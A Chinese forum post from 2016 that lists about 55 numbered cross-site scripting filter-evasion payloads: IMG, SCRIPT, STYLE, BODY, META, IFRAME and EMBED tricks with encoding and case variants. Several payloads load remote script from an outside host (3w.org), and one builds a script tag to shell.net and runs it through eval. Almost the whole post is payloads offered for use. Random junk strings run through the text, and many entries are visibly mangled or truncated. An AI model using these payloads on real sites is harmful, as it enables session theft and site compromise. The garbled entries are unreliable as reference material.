(1)普通的XSS JavaScript注入
1 c E' N& P2 Z% c( w<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# X V5 e! X! Z, L3 P4 |(99)另类弹框
7 o% M7 x( |! |7 j) D! O& ^4 f<q/oncut=alert()>1
3 O; `# h. p' ~% o" l: L<s/onclick=alert()>b
t) v+ E% h* r+ Q4 g" x% t <XSS=" onclick="alert(1)//">clickme</SSX=">
# p# [3 a5 M6 l. U <zzz onclick=alert`1`>clickme</zzz>
4 ]7 \6 z7 S! V <a onclick=alert`1`>clickme</a>6 i7 t/ x5 T& g- o! ~
<a=">clickme</a=">; k6 l$ {9 ]/ @
<a=">clickme</a>
. R4 p% V6 ?+ j! g5 M<z=">clickme</z=">3 B' g+ c7 N% U" `
<z onclick=alert`1`>clickme</z>/ {% ^- l/ u7 y" N9 n9 v% K
- j: h9 S- ]+ a
(2)IMG标签XSS使用JavaScript命令' m" |. u* B4 B. x/ [" V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 i1 P. P' @: x! P6 |+ @( y% L3 A4 b1 _& N( g7 C0 b6 z, Q
(3)IMG标签无分号无引号; b' a0 K3 o/ z" I' ]
<IMG SRC=javascript:alert(‘XSS’)>1 d9 ~, u( {: j f( K
& x6 t' G4 i: q: Q; L1 h c$ K
(4)IMG标签大小写不敏感; F8 e2 T- I1 h8 A
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>; E0 L! B/ t t. F& s* p! f
' _% _. e4 [8 V
(5)HTML编码(必须有分号)
# i# r: b, e2 `- G1 \$ O$ D<IMG SRC=javascript:alert(“XSS”)>
9 m2 N3 }" x a& H! s( m6 C
' {; q, [7 @/ n" `/ |* t9 H(6)修正缺陷IMG标签
, D7 `9 S2 J9 n- b: c2 H: ]<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
" g0 A2 d% r z9 d' v/ \" G% }
( K3 ?5 v6 D- n4 d(7)formCharCode标签(计算器)* D* L, K% D/ t
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
8 ]* q3 U6 r6 }" i) O1 O t
1 _- a B+ P, o* b/ |' f(8)UTF-8的Unicode编码(计算器)
2 Y+ d# O* [7 |8 ~( J- Q- W _2 O<IMG SRC=jav..省略..S')>
+ G! L3 p/ o! y- R/ j6 ]8 b
, l% e9 i+ L, M/ B7 i' e/ T(9)7位的UTF-8的Unicode编码是没有分号的(计算器)) k x4 t: g s& C3 L8 O0 S
<IMG SRC=jav..省略..S')>; x) c. M' J* N5 c
2 N, O. \) ~1 m# q; D; w! h
(10)十六进制编码也是没有分号(计算器)
3 K; g9 f( @7 J& y" a2 B5 a% \- }<IMG SRC=\'#\'" /span>0 \% u' E" l c$ @5 H: \
: G: v9 Z8 }: w2 k(11)嵌入式标签,将Javascript分开
% B# _- Y# ~9 O* w<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>0 h1 F* q; |6 D: s' h( a
8 W! o: `% W# A6 m(12)嵌入式编码标签,将Javascript分开
; a% T3 f7 r% h* N# q+ C<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
( ?4 O5 D0 E2 e8 F8 b6 B" c1 U2 W6 h, C
(13)嵌入式换行符& y* a8 m$ f' l+ J. p3 V
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>0 B8 k5 I2 M- U0 D) B2 L
' n; |' G% _" b# i: {/ g(14)嵌入式回车
" ^' u( a7 D; t2 N! G<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>: |! p) I5 l h% g+ [
* v; b: o) g2 t' x
(15)嵌入式多行注入JavaScript,这是XSS极端的例子+ [8 L& z: H0 v: N3 y- p+ Z
<IMG SRC=\'#\'" /span>0 Q; k9 C( P% o& u
8 Z6 z0 l9 c# ]6 I
(16)解决限制字符(要求同页面)" D2 L! g7 A. i; E! `1 v! M8 g: T8 v
<script>z=’document.’</script>
7 w& i7 K" M z/ i/ K+ d<script>z=z+’write(“‘</script>5 D+ L% X1 u. S
<script>z=z+’<script’</script>: f. C9 `- ?, c" L, `
<script>z=z+’ src=ht’</script>5 [7 d; K% ~( u3 ]3 }: m' a
<script>z=z+’tp://ww’</script>- f1 v, X) R9 i* D) ^7 r @+ I# H
<script>z=z+’w.shell’</script>9 S" ?5 |/ e# ~/ m! {
<script>z=z+’.net/1.’</script>! u3 y7 `4 g7 Z+ I* _& y3 r
<script>z=z+’js></sc’</script>+ V s0 t) a) ~
<script>z=z+’ript>”)’</script>
/ q* N+ P3 w7 [; k6 q* ^<script>eval_r(z)</script>$ d9 l* D' }- v+ r1 w, l
5 V7 r4 u' K, n; u( d: E5 Q
(17)空字符
* j2 i8 Q( r; s- P5 Tperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out5 u! {# m( ?0 F" d3 S0 B2 T
5 [9 _8 t/ p: i ]/ X |1 J1 X
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) \/ x+ o4 G# h+ y8 o
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
* n0 v. G9 h E, }( _
$ r( ]9 \" W' N, n' K(19)Spaces和meta前的IMG标签
8 T6 Z, ]% `, I0 z/ N<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
, U$ |( M2 a) k) Q6 G
- _& P8 L5 \# A t: @(20)Non-alpha-non-digit XSS
8 P( R# {! y+ x6 `) _- Q<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>) B; B2 m( D) p$ a8 {9 H8 `
9 ?# A/ P" P( C G" _
(21)Non-alpha-non-digit XSS to 2
6 K: y: e( V0 S: d& B6 @9 Q<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>6 ~4 B9 a+ [0 q& R4 h* A
$ {& h) t# J. ^/ f(22)Non-alpha-non-digit XSS to 3( }* }# e4 l, G$ p/ j5 j% P/ M
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
, d: D5 X% X0 f4 D- Q2 \" a
( r* T- ]! O6 G/ |(23)双开括号4 i$ o' U$ [( ^' I4 E+ w5 o) W
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
4 U0 Y* \) T% J- b1 q; ]. d9 c: o5 Z+ ]9 Y1 E
(24)无结束脚本标记(仅火狐等浏览器)
7 X* C+ y- Z; J* {<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
% r, E- E- |! [8 R2 d! ^
1 g+ q5 D. l) C: I/ ?* V7 B(25)无结束脚本标记2
) Y3 Q- O9 K5 n5 Z! B* q2 H: p<SCRIPT SRC=//3w.org/XSS/xss.js>
2 x" ?3 S! G3 V4 X+ W+ k0 N) f% D* o
(26)半开的HTML/JavaScript XSS
8 e3 d$ D- Z: n' @+ V7 |$ h<IMG SRC=\'#\'" /span>
. G0 z( L: |. W$ a+ a6 _
/ ?5 p/ K' f1 a5 ?* t(27)双开角括号& b" ~& F8 K$ S7 K7 Q' R
<iframe src=http://3w.org/XSS.html <
3 R, t5 B- @' K% f" `! f( x' ^$ E! p1 }9 u" Z% ]
(28)无单引号 双引号 分号
" f; c. v i% P6 n<SCRIPT>a=/XSS/' c/ P3 I4 J/ R4 Q( Q8 W
alert(a.source)</SCRIPT>% H+ I1 c, x5 T0 _1 c+ U4 r2 H$ U
5 c* b" i% `6 f- `! {(29)换码过滤的JavaScript' B+ k0 w2 w; y# e4 `# p# `9 M
\”;alert(‘XSS’);//
& B( G1 _# F% k2 X) @& X
2 J- ^: k/ @& t+ y" R5 @(30)结束Title标签$ {# e3 r: F1 k2 c3 h9 s
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
# Y e& _# m1 B& D# K2 B; r8 U0 M. H8 A0 @* [
(31)Input Image
& G$ F# M5 ?- \! m6 U( r2 b<INPUT SRC=\'#\'" /span># L. _; v9 l: Q' Y0 m4 H$ ~7 G
) W* Z, {5 v, b2 V
(32)BODY Image
6 l4 C8 [& X( N# p* s7 _. h<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 B4 d0 I q2 A4 Y: R! A4 f: u( p6 K; a8 K! ~
(33)BODY标签
) ?# {1 E& \) N2 S& \; f; j<BODY(‘XSS’)>
2 U6 ]( {, d7 ^7 A
, K$ Z( S I. a, M3 Z2 M. a! y(34)IMG Dynsrc- S1 k0 H- N: u, I5 G
<IMG DYNSRC=\'#\'" /span>* B9 g2 C0 c# d; r
} e$ h% z) Z(35)IMG Lowsrc
6 k4 q1 u; \; P7 g5 J+ d5 p# i; v1 `2 W<IMG LOWSRC=\'#\'" /span>
9 z( E r. z b8 B, ]' |: \" y( n0 E* p9 ]; W
(36)BGSOUND4 C6 \9 m3 t! k' \7 d& F
<BGSOUND SRC=\'#\'" /span>
6 N2 G8 v* [: ~* D0 P' @# u+ j0 H g/ r: v" b$ {- c
(37)STYLE sheet: ^; H2 H; v2 h- O) ?) ~# g& E' u
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
* Z1 N2 m- T1 p
# G! u6 s. P2 n# g5 h(38)远程样式表" ~! F8 f& a$ {
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
2 e8 ^2 ~! B. k! \% r, I! d, G
: D0 |) o6 z3 { B' B( W. P(39)List-style-image(列表式)! F( g$ J- @ f4 m/ ?' i
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS2 m) j& F& p7 T1 O6 z& D% q$ d
% @9 g9 G5 i6 O% y6 |/ y+ \% g
(40)IMG VBscript" ]$ S$ t# w% |$ ]: d
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
2 y+ Z0 D1 L' `5 K8 k, R% N7 z' j+ P0 I! I, y
(41)META链接url
: d7 U6 ?( y) e5 S/ n1 {' B. p<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
( [" {" T/ I: r6 j+ e5 B3 p& a; U8 B3 p
(42)Iframe
& P6 t+ R2 q7 o<IFRAME SRC=\'#\'" /IFRAME>% ]. ~' j* ~2 E' e% J, [
3 u7 x+ [+ l5 Y5 C; P( U9 S: x- A5 O
(43)Frame+ p/ H, j2 V. ]6 h* s0 q" J
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
$ B+ N; I2 k9 b7 w
$ E, R7 |3 j" R3 j' u. A(44)Table
- S5 e" h# t- {# {5 _! Y<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& q0 O# d' ?1 M B
# g; L& F8 E1 O$ D. M8 ^# W$ ~% g(45)TD3 M& S/ ~+ Z4 `# a+ u5 j
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. Q4 h- { W$ `# V+ L0 Y
9 @+ O& {2 Z1 \1 Z: L- N: r. Y
(46)DIV background-image7 C2 b6 t' \/ J; h0 A0 P0 a
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
0 M5 m2 H+ h$ U9 L, P
" J" S# O3 ~1 t' J8 D8 g: W(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279), O& V! ?; m1 C( @ ^( j2 e
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
: \+ q4 b. ^! G: x7 U7 _) e: z C; C% y% E1 D+ s9 H
(48)DIV expression( g# c i# f* }0 Z$ D5 x' U1 X, i, j
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>6 S3 r+ B( H2 ?) e2 k0 A! H, n# |, l
% L! Y! T: S& R. ?) @9 e5 S(49)STYLE属性分拆表达 \; L+ X4 i6 u \9 x
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
1 d" {& l1 ^4 ?8 n$ t
; _4 e2 o' g6 [(50)匿名STYLE(组成:开角号和一个字母开头)6 N3 W1 |+ N- }: @! C0 b; A
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>3 d5 {, o7 D2 z7 y: q# [# u' ~
3 `# s/ K' A9 \$ i(51)STYLE background-image1 S2 b6 U/ ]8 E$ l
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
# \2 y f' m7 y
1 y6 c" c$ W7 R) j6 z(52)IMG STYLE方式
r9 m3 r9 \! C8 fexppression(alert(“XSS”))’>
8 r2 [0 C; h7 c( R7 O7 Q L7 b; H+ d
: k3 N' a0 |) O" O" S(53)STYLE background
2 B. Y/ S: g, ?1 N' j% v" s<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>0 z9 Q; Y( f# S) K2 z9 v
6 R: V/ C& @, t% z8 ?0 Z2 \(54)BASE+ j" q& E* b* u7 z
<BASE HREF=”javascript:alert(‘XSS’);//”>
' c3 ^8 Q2 u' ^$ U
% n2 l! g6 L/ N4 O7 K(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
5 \- _$ I( Z, W. [* F<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
, l r1 X& I. e K1 Q" U1 a |
发表于 2016-4-28 10:06:15
收藏
支持
反对